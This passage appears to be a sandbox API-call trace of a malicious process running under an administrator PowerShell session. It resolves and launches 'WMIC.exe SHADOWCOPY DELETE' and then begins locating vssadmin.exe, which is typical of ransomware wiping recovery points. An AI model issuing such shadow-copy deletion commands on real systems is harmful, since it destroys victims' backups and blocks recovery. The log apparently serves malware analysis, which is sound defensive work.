lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.679] SetErrorMode (uMode=0x1) returned 0x1 [0093.679] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0093.679] SetErrorMode (uMode=0x1) returned 0x1 [0093.680] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.CMD", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.680] SetErrorMode (uMode=0x1) returned 0x1 [0093.680] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0093.680] SetErrorMode (uMode=0x1) returned 0x1 [0093.680] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBS", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.681] SetErrorMode (uMode=0x1) returned 0x1 [0093.681] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0093.681] SetErrorMode (uMode=0x1) returned 0x1 [0093.681] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBE", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.681] SetErrorMode (uMode=0x1) returned 0x1 [0093.681] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0093.682] SetErrorMode (uMode=0x1) returned 0x1 [0093.682] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JS", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.682] SetErrorMode (uMode=0x1) returned 0x1 [0093.682] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0093.682] SetErrorMode (uMode=0x1) returned 0x1 [0093.682] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JSE", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.683] SetErrorMode (uMode=0x1) returned 0x1 [0093.683] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0093.683] SetErrorMode (uMode=0x1) returned 0x1 [0093.683] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSF", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.683] SetErrorMode (uMode=0x1) returned 0x1 [0093.684] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0093.684] SetErrorMode (uMode=0x1) returned 0x1 [0093.684] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSH", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.684] SetErrorMode (uMode=0x1) returned 0x1 [0093.684] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0093.685] SetErrorMode (uMode=0x1) returned 0x1 [0093.685] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.MSC", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.685] SetErrorMode (uMode=0x1) returned 0x1 [0093.685] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0093.685] SetErrorMode (uMode=0x1) returned 0x1 [0093.685] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.686] SetErrorMode (uMode=0x1) returned 0x1 [0093.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0093.686] SetErrorMode (uMode=0x1) returned 0x1 [0093.686] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.ps1", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.687] SetErrorMode (uMode=0x1) returned 0x1 [0093.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0093.687] SetErrorMode (uMode=0x1) returned 0x1 [0093.687] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psm1", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.687] SetErrorMode (uMode=0x1) returned 0x1 [0093.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0093.688] SetErrorMode (uMode=0x1) returned 0x1 [0093.688] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psd1", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.688] SetErrorMode (uMode=0x1) returned 0x1 [0093.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0093.688] SetErrorMode (uMode=0x1) returned 0x1 [0093.688] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.COM", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0093.689] SetErrorMode (uMode=0x1) returned 0x1 [0093.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7dde40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0093.689] SetErrorMode (uMode=0x1) returned 0x1 [0093.689] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.EXE", lpFindFileData=0x1c7ddfe0 | out: lpFindFileData=0x1c7ddfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x2666a0 [0093.690] FindNextFileW (in: hFindFile=0x2666a0, lpFindFileData=0x1c7ddff0 | out: lpFindFileData=0x1c7ddff0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0 [0093.691] FindClose (in: hFindFile=0x2666a0 | out: hFindFile=0x2666a0) returned 1 [0093.691] SetErrorMode (uMode=0x1) returned 0x1 [0093.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", nBufferLength=0x105, lpBuffer=0x1c7de100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpFilePart=0x0) returned 0x21 [0093.692] SetErrorMode (uMode=0x1) returned 0x1 [0093.692] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c7de310 | out: lpFileInformation=0x1c7de310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400)) returned 1 [0093.701] SetErrorMode (uMode=0x1) returned 0x1 [0093.702] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.702] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.702] CoTaskMemFree (pv=0x2e4780) [0093.704] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.704] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.704] CoTaskMemFree (pv=0x2e4780) [0093.709] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.709] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.710] CoTaskMemFree (pv=0x2e4780) [0093.729] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.729] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.729] CoTaskMemFree (pv=0x2e4780) [0093.742] CoTaskMemAlloc (cb=0x23) returned 0x1b851ef0 [0093.743] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c7de4f8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7de4f8) returned 0x4550 [0093.752] CoTaskMemFree (pv=0x1b851ef0) [0093.755] GetConsoleWindow () returned 0x40270 [0093.763] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="") returned 0x0 [0093.763] CoTaskMemFree (pv=0x2e4780) [0093.764] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.764] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0093.764] CoTaskMemFree (pv=0x2e4780) [0093.770] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0093.770] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0093.770] CoTaskMemFree (pv=0x2e4780) [0093.772] CommandLineToArgvW (in: lpCmdLine=" SHADOWCOPY DELETE", pNumArgs=0x1c7de540 | out: pNumArgs=0x1c7de540) returned 0x1b85d240*="" [0093.774] lstrlenW (lpString="SHADOWCOPY") returned 10 [0093.775] CoTaskMemAlloc (cb=0x18) returned 0x2749d0 [0093.775] RtlMoveMemory (in: Destination=0x2749d0, Source=0x1b85d262, Length=0x16 | out: Destination=0x2749d0) [0093.775] CoTaskMemFree (pv=0x2749d0) [0093.775] lstrlenW (lpString="DELETE") returned 6 [0093.775] CoTaskMemAlloc (cb=0x10) returned 0x2749d0 [0093.775] RtlMoveMemory (in: Destination=0x2749d0, Source=0x1b85d278, Length=0xe | out: Destination=0x2749d0) [0093.775] CoTaskMemFree (pv=0x2749d0) [0093.776] LocalFree (hMem=0x1b85d240) returned 0x0 [0093.777] CoTaskMemAlloc (cb=0x804) returned 0x1b8615c0 [0093.777] GetConsoleTitleW (in: lpConsoleTitle=0x1b8615c0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0093.777] CoTaskMemFree (pv=0x1b8615c0) [0093.787] CoTaskMemAlloc (cb=0x8c) returned 0x29df60 [0093.787] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" SHADOWCOPY DELETE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c7de4a0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f94c0 | out: lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" SHADOWCOPY DELETE", lpProcessInformation=0x30f94c0*(hProcess=0x378, hThread=0x374, dwProcessId=0xb50, dwThreadId=0xb10)) returned 1 [0093.796] CoTaskMemFree (pv=0x29df60) [0093.797] CloseHandle (hObject=0x374) returned 1 [0093.797] CoTaskMemAlloc (cb=0x23) returned 0x1b851ef0 [0093.797] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c7de548, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7de548) returned 0x4550 [0093.798] CoTaskMemFree (pv=0x1b851ef0) [0093.802] GetCurrentProcess () returned 0xffffffffffffffff [0093.802] GetCurrentProcess () returned 0xffffffffffffffff [0093.802] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x378, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7de628, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7de628*=0x374) returned 1 [0201.517] CloseHandle (hObject=0x374) returned 1 [0201.522] GetExitCodeProcess (in: hProcess=0x378, lpExitCode=0x1c7de698 | out: lpExitCode=0x1c7de698*=0x0) returned 1 [0201.532] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0201.539] CloseHandle (hObject=0x378) returned 1 [0201.554] SetEvent (hEvent=0x32c) returned 1 [0201.554] SetEvent (hEvent=0x310) returned 1 [0201.554] SetEvent (hEvent=0x314) returned 1 [0201.554] SetEvent (hEvent=0x3b4) returned 1 [0201.554] SetEvent (hEvent=0x34c) returned 1 [0201.554] SetEvent (hEvent=0x340) returned 1 [0201.554] SetEvent (hEvent=0x344) returned 1 [0201.554] SetEvent (hEvent=0x348) returned 1 [0201.554] SetEvent (hEvent=0x350) returned 1 [0201.558] CoUninitialize () Thread: id = 139 os_tid = 0x330 [0201.600] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0201.603] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0201.605] VirtualQuery (in: lpAddress=0x1d18d660, lpBuffer=0x1d18e520, dwLength=0x30 | out: lpBuffer=0x1d18e520*(BaseAddress=0x1d18d000, AllocationBase=0x1c800000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0201.631] VirtualQuery (in: lpAddress=0x1d18d910, lpBuffer=0x1d18e7d0, dwLength=0x30 | out: lpBuffer=0x1d18e7d0*(BaseAddress=0x1d18d000, AllocationBase=0x1c800000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0201.643] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0201.643] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0201.643] CoTaskMemFree (pv=0x2e4780) [0201.643] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0201.644] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0201.644] CoTaskMemFree (pv=0x2e4780) [0201.645] CoTaskMemAlloc (cb=0x20e) returned 0x2fcd20 [0201.645] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2fcd20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0201.645] CoTaskMemFree (pv=0x2fcd20) [0201.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1d18d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0201.647] SetErrorMode (uMode=0x1) returned 0x1 [0201.647] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\vssadmin.ps1", lpFindFileData=0x1d18d840 | out: lpFindFileData=0x1d18d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.648] SetErrorMode (uMode=0x1) returned 0x1 [0201.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1d18d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0201.648] SetErrorMode (uMode=0x1) returned 0x1 [0201.648] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\vssadmin.psm1", lpFindFileData=0x1d18d840 | out: lpFindFileData=0x1d18d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.649] SetErrorMode (uMode=0x1) returned 0x1 [0201.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1d18d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0201.649] SetErrorMode (uMode=0x1) returned 0x1 [0201.649] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\vssadmin.psd1", lpFindFileData=0x1d18d840 | out: lpFindFileData=0x1d18d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.650] SetErrorMode (uMode=0x1) returned 0x1 [0201.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1d18d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0201.650] SetErrorMode (uMode=0x1) returned 0x1 [0201.650] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", lpFindFileData=0x1d18d840 | out: lpFindFileData=0x1d18d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.650] SetErrorMode (uMode=0x1) returned 0x1 [0201.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1d18d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0201.651] SetErrorMode (uMode=0x1) returned 0x1 [0201.651] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", lpFindFileData=0x1d18d840 | out: lpFindFileData=0x1d18d840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2f501b5, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xd2f501b5, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0xfa124bf0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x28e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="vssadmin.exe", cAlternateFileName="")) returned 0x2666a0 [0201.651] FindNextFileW (in: hFindFile=0x2666a0, lpFindFileData=0x1d18d850 | out: lpFindFileData=0x1d18d850*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2f501b5, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xd2f501b5, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0xfa124bf0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x28e00, dwReserved0=0x0, dwReserved1=0x0, 